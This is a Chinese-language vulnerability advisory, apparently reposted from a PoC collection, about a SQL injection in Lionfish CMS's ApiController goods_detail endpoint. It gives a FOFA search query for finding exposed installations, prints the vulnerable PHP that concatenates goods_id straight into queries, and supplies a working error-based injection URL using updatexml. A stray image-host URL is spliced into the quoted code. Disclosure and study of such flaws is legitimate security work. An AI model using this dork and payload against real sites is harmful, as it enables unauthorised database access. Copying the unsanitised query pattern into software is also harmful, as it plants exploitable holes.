本章提供的所有内容仅供学习、交流和分享用途,只供参考。本站资源禁止并谢绝未经本站许可的使用,如若欲转载,请署名以及注明出处,请务必以文字链接的形式标明或保留文章原始出处和作者的信息。本站(原创)文章、资源、图片等所有内容,一经转载,即表示您已经接受上述声明!需自行承担一切风险与责任;
漏洞描述
狮子鱼 CMS ApiController.class.php 参数过滤存在不严谨,导致 SQL 注入漏洞
漏洞影响
狮子鱼CMS
FOFA
"/seller.php?s=/Public/login"漏洞复现
登录界面如下
poc
存在漏洞的文件为 ApiController.class.php , 关键位置为
public function goods_detail()
{
$goods_id = I('get.goods_id');
//gallery =>img_url
//goods goods.goods_desc goods_name group_price market_price sell_count group_number
$sql="select g.*,gd.description,gd.summary,gd.tag from ".
C('DB_PREFIX')."goods g,".C('DB_PREFIX')."goods_description
gd where g.goods_id=gd.goods_id and g.goods_id=".$goods_id;
$goods_arr=M()->query($sql);
$qian=array("
");
$hou=array("<br/>");
$goods_arr[0]['summary'] = str_replace($qian,$hou,$goods_arr[0]['summary']);
$sql="select image from ".C('DB_PREFIX')."goods_image where goods_id=".$goods_id;
$goods_image=M()->query($sql);
$gallery = array();
$default_image = '';
foreach($goods_image as $val)
{
$val['img_url'] = str_replace('http','https',C('SITE_URL')).'/Uploads/ http://peiqi-wiki-poc.oss-cn-beijing.aliyuncs.com/vul n/'.$val['image'];
if(empty($default_image))
{
$default_image = str_replace('http','https',C('SITE_URL')).resize($val['image'], C('goods_thumb_width'), C('goods_thumb_height'));
}
$gallery[] = array('img_url' => $val['img_url']);
}
$goods = $goods_arr[0];
}漏洞测试为
https://xxx.xxx.xx.xxx/index.php?s=api/goods_detail&goods_id=1%20and%20 updatexml(1,concat(0x7e,md5(1),0x7e),1)图片显示
文章内容源
http://www.wwlib.cn/index.php/artread/artid/10227.html
